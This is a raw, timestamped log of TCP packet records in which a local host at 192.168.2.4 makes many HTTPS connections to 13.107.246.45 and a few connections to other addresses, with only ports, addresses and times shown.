Nov 7, 2024 07:33:13.466224909 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.466243982 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.466249943 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.476481915 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.476505041 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.476608038 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.485496998 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.485510111 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.532150030 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.532654047 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.532671928 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.533063889 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.533068895 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.559933901 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.566776991 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.567516088 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.567549944 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.568017006 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.568022966 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.571949005 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.571957111 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.572539091 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.572542906 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.661067963 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.661083937 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.661118984 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.661149979 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.661185026 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.661351919 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.661362886 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.661372900 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.661376953 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.663505077 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.663530111 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.663598061 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.663702011 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.663713932 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.692456961 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.692498922 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.692545891 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.692670107 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.692683935 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.692693949 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.692698002 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.694509029 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.694523096 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.694591045 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.694698095 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.694708109 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.697201967 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.697423935 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.697474957 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.697505951 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.697510004 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.697520018 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.697524071 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.699229002 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.699258089 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.699327946 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.699414015 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.699430943 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.951833963 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.955290079 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.955302954 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.955672026 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.955677032 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.083303928 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.083331108 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.083379984 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.083414078 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.083440065 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.084669113 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.084669113 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.084683895 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.084693909 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.090965986 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.090995073 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.091053009 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.100667953 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.100681067 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.227776051 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.228370905 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.228384018 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.228966951 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.228972912 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.360958099 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.360982895 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.361035109 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.361043930 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.361077070 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.361279964 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.361294031 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.361304998 CET	49821	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.361310959 CET	443	49821	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.364671946 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.364710093 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.364866018 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.365122080 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.365137100 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.401896000 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.412935019 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.412945032 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.413369894 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.413373947 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.424217939 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.427190065 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.427202940 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.427627087 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.427632093 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.465444088 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.491218090 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.491242886 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.491682053 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.491688967 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.539865971 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.539884090 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.539918900 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.539933920 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.539977074 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.547519922 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.547527075 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.547537088 CET	49822	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.547542095 CET	443	49822	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.553046942 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.553096056 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.553145885 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.554686069 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.554708004 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.554770947 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.555217028 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.555227041 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.555236101 CET	49823	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.555242062 CET	443	49823	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.560128927 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.560142040 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.561496973 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.561547995 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.561806917 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.561975002 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.561995983 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.622248888 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.622296095 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.622384071 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.622617006 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.622617006 CET	49824	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.622639894 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.622651100 CET	443	49824	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.625731945 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.625760078 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.625948906 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.626096964 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.626105070 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.826242924 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.869153976 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.878396988 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.878407001 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:14.878820896 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:14.878827095 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.004254103 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.004334927 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.004410982 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.030484915 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.030498981 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.030509949 CET	49825	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.030514002 CET	443	49825	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.050308943 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.050352097 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.050657034 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.050992012 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.051006079 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.080957890 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.081445932 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.081455946 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.081890106 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.081895113 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.208607912 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.208700895 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.208822966 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.218841076 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.218863964 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.218897104 CET	49826	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.218903065 CET	443	49826	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.227319002 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.227335930 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.227401972 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.228051901 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.228063107 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.288369894 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.295721054 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.338857889 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.353533030 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.365307093 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.416018963 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.468996048 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.469007969 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.469532967 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.469540119 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.470115900 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.470132113 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.473179102 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.473184109 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.531196117 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.531204939 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.531860113 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.531863928 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.576908112 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:15.577337027 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:15.582097054 CET	80	49832	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:15.582163095 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:15.582334042 CET	80	49787	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:15.582380056 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:15.590462923 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:15.592206955 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.592500925 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.592551947 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.595273018 CET	80	49832	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:15.599422932 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.599471092 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.599597931 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.608968019 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.608985901 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.609002113 CET	49828	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.609009027 CET	443	49828	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.626805067 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.626816988 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.626826048 CET	49827	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.626835108 CET	443	49827	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.633847952 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.633872032 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.633944988 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.643584013 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.643632889 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.643690109 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.643939018 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.643949986 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.650064945 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.650083065 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.658489943 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.658535004 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.658592939 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.659064054 CET	49829	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.659074068 CET	443	49829	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.664427042 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.664436102 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.664491892 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.664716005 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.664725065 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.786808014 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.787935019 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.787947893 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.788661957 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.788666964 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.917392015 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.917506933 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.917553902 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.919631004 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.919644117 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.919670105 CET	49830	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.919676065 CET	443	49830	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.945116997 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.945138931 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.945207119 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.950653076 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.952434063 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.952447891 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.960813999 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.960839033 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:15.961412907 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:15.961417913 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.085613966 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.085716009 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.085809946 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.097984076 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.097994089 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.098016024 CET	49831	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.098020077 CET	443	49831	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.404258013 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.404287100 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.404381037 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.421047926 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.424340010 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.462893009 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.471204042 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.471219063 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.478523970 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.483570099 CET	80	49832	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:16.483761072 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:16.485826969 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.485836029 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.486640930 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.486644983 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.487044096 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.487054110 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.487418890 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.487425089 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.615345001 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.615396023 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.615497112 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.619884014 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.620121956 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.620254993 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.692086935 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.744137049 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.776767015 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.776781082 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.776791096 CET	49835	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.776796103 CET	443	49835	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.778482914 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.778482914 CET	49834	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.778522015 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.778533936 CET	443	49834	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.794454098 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.794465065 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.795036077 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.795042038 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.878815889 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.878834963 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.878952026 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.924645901 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.924676895 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.924722910 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:16.924743891 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:16.924798965 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.099138975 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.099158049 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.099239111 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.100970984 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.100984097 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.101418018 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.101425886 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.101453066 CET	49836	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.101458073 CET	443	49836	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.191005945 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.207737923 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.207751036 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.241256952 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.291696072 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:17.291707993 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:17.291944981 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:17.295205116 CET	49840	443	192.168.2.4	172.240.127.234
